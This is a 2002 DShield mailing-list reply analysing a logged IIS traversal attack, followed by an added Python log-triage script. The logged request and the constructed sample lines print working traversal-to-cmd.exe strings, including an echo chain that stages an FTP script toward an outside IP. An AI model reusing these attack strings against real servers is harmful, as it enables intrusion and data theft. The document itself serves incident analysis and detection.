[Dshield] Any ideas...

van Niekerk Niel nielvanniekerk at oldmutual.com
Fri Jun 14 09:28:37 GMT 2002


Richard Golodner wrote:

> Do any of you know what this might be ? It has started to show up in my
> logs and I am no exploit expert. Any suggestions or wild guesses are
> appreciated. 
> 					Thanks, Rich
> 
> 
> 	GET, /scripts/..%5c..%5ctemp/_/_tmp/cnd.exe,
> /echo.open%20206.45.20.139>c:\temp\_\_tmp\f.txt&echo.anonymous%20e at mail.com>>c:\temp\_\_tmp\f.txt&c+echo.binary>>c:\temp\_\_tmp\f.txt,

Hi Richard,

This is what it looks like to me:

A directory traversal attempt to a non-standard path (c:\temp\_\_tmp\cnd.exe).
I would assume that cnd.exe is just a straight copy of
c:\winnt\system32\cmd.exe (most likely) or some other Windows command shell
(unlikely, too much hassle). The exploit then creates f.txt in the same
directory as cnd.exe, containing the following FTP commands:

open 206.45.20.139
anonymous e at mail.com
binary

(This all assumes success in the dir traversal and that the file cnd.exe
actually exists in that path. I am not sure why "they" didn't just use the
standard <server>/scripts/../../winnt/system32/cmd.exe.)

Why would this be done?
I would guess that there should be more commands piped to the FTP file to
transfer some files (either a GET request to download some backdoor utils, or
a PUT to grab data files, the backup SAM file or some such thing) and
then another traversal command execution to use the text file as input
for an FTP session (of the "ftp -s:f.txt" type).

What should you do?
- I assume you are running your web server on NT/Win2K. If it is running on
Linux, this specific attempt will not affect you at all and you can ignore
the rest of this; however, you must still keep up with security fixes and
good practices...
- Look in your logs to see what responses your server gave to the dir
traversal and other commands. If it is a 404 or 403 (file not found / access
denied) you should be OK, but this still warrants some further
investigation. If not, you should immediately remove the server from the
Internet and your network and either do an audit to see what happened or
rebuild it in totality, installing all the correct patches for your web
server BEFORE you reconnect it to the net. (If you are running IIS you are
probably also infected with Nimda and/or Code Red if this traversal worked.)
- Regardless of the exploit's success or not, contact the owners/ISP of the
FTP server (see below) and notify them of this attempted
exploit.

The FTP server the exploit tries to connect to resolves to:
206-45-20-139.mts.ne

Trying whois -h whois.arin.net 206.45.20.139
MBnet Networking Inc (NETBLK-MANITOBA-2)
   15 Gillson Street
   Winnipeg, Manitoba R3T 5V6
   CA

   Netname: MANITOBA-2
   Netblock: 206.45.0.0 - 206.45.255.255
   Maintainer: MB

   Coordinator:
      Pruden, Jason  (JP1488-ARIN)  netadmin at mts.mb.ca
      +1 (204) 941-7573

Hope this helps

Niel
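The triage Niel describes (decode the traversal, rebuild the FTP script the echo chain writes, then judge by the status code the server returned) can be scripted. The block below is an added example, not code from the original post or from DShield. The log lines in SAMPLE_LOG are constructed: the first mirrors the request Rich posted, the other two are assumed for illustration, and the field layout (date, time, client, method, uri-stem, uri-query, status) is a simplified W3C-style layout rather than the comma-separated IIS format shown in the post. Decoding runs percent-decoding twice to reproduce the IIS double-decode bug (MS01-026), so %255c variants are caught as well as the plain %5c form in the post.

```python
"""Decode and triage IIS log lines carrying the traversal / FTP-script trick
discussed on the list. Added example, not code from the original post."""
import re
from urllib.parse import unquote

# Constructed sample log lines (date time client method stem query status).
# Line 1 mirrors the request Rich posted; lines 2 and 3 are assumptions for
# illustration and were not in the original message.
SAMPLE_LOG = r"""
2002-06-13 17:35:01 10.0.0.5 GET /scripts/..%5c..%5ctemp/_/_tmp/cnd.exe /echo.open%20206.45.20.139>c:\temp\_\_tmp\f.txt&echo.anonymous%20e@mail.com>>c:\temp\_\_tmp\f.txt&c+echo.binary>>c:\temp\_\_tmp\f.txt 404
2002-06-13 17:36:44 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\ 200
2002-06-13 17:37:10 10.0.0.9 GET /index.html - 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")
# "echo.text>file", "echo text>>file", optionally preceded by a stray "/" or "c "
ECHO_REDIRECT = re.compile(r"^/?(?:c\s+)?echo[.\s]+(.*?)\s*>(>?)\s*(\S+)$", re.I)
FTP_VERBS = {"open", "user", "anonymous", "binary", "bin", "get", "put",
             "mget", "mput", "quit", "bye"}


def iis_decode(s: str) -> str:
    """Decode like the vulnerable IIS did: '+' is a space, and percent-decoding
    runs twice, so %255c -> %5c -> backslash (the MS01-026 double-decode bug)."""
    return unquote(unquote(s.replace("+", " ")))


def ftp_script_from_query(query: str) -> dict:
    """Rebuild the file(s) an echo-redirect chain writes: {path: [lines]}."""
    files = {}
    for cmd in query.split("&"):
        m = ECHO_REDIRECT.match(cmd.strip())
        if m:
            text, append, path = m.groups()
            lines = files.setdefault(path.lower(), [])
            if not append:
                lines.clear()  # a single '>' truncates the file first
            lines.append(text.strip())
    return files


def analyse(line: str) -> dict:
    _date, _time, client, method, stem, query, status = line.split()
    path = iis_decode(stem)
    args = "" if query == "-" else iis_decode(query)
    status = int(status)
    findings = []
    if TRAVERSAL.search(path):
        findings.append("directory traversal")
    if path.lower().endswith(".exe"):
        findings.append("binary requested: " + re.split(r"[\\/]", path)[-1])
    files = ftp_script_from_query(args)
    for fname, lines in files.items():
        first = lines[0].split() if lines else []
        if first and first[0].lower() in FTP_VERBS:
            findings.append("ftp script staged in " + fname)
    if not findings:
        verdict = "benign"
    elif status in (403, 404):
        # Niel's rule: 403/404 means the traversal probably did not land
        verdict = "attempted, blocked (verify, then watch the source)"
    else:
        verdict = "LIKELY EXECUTED (status %d): isolate and audit" % status
    return {"client": client, "method": method, "path": path, "args": args,
            "status": status, "findings": findings, "files": files,
            "verdict": verdict}


def triage(log_text: str) -> list:
    return [analyse(l) for l in log_text.strip().splitlines() if l.strip()]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["status"], r["verdict"], r["findings"])
        for fname, lines in r["files"].items():
            print("  " + fname + ":", " | ".join(lines))
```

Run against the constructed sample, the first line decodes to /scripts/..\..\temp/_/_tmp/cnd.exe with a staged f.txt of "open 206.45.20.139 / anonymous e@mail.com / binary" and is rated "attempted, blocked" because the server answered 404; the second, double-encoded cmd.exe request answered with 200 is rated as likely executed, which is the case where Niel says to pull the host off the network. Any status other than 403/404 on a traversal is treated as a hit, because a 200 here means the server found and ran the path.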



-----Original Message-----
From: Richard Golodner [mailto:RGolodner at aetea.com]
Sent: 13 June 2002 17:35
To: 'list at dshield.org'
Subject: [Dshield] Any ideas...

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

